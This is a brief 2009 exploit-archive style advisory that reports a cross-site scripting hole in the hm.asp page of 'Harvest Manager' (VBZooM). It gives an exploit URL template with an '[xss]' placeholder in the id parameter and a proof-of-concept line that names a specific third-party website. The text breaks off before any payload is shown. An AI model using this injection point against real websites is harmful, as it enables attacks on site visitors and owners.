#***************************************************************# #Title : Harvest Manager [XSS vulnerability] #***************************************************************# #Software : VBZooM #Date : 06/26/2009 #Author : S3T4N #Contact : root[at]sux0r.net #Blog : http://sux0r.net #***************************************************************# #[o]Vulnerable file #hm.asp #***************************************************************# #[o] Exploit #http://target/mx/hm.asp?id=[xss] #***************************************************************# #[o] POC #http://www.cocaction.com/mx/hm.asp?id=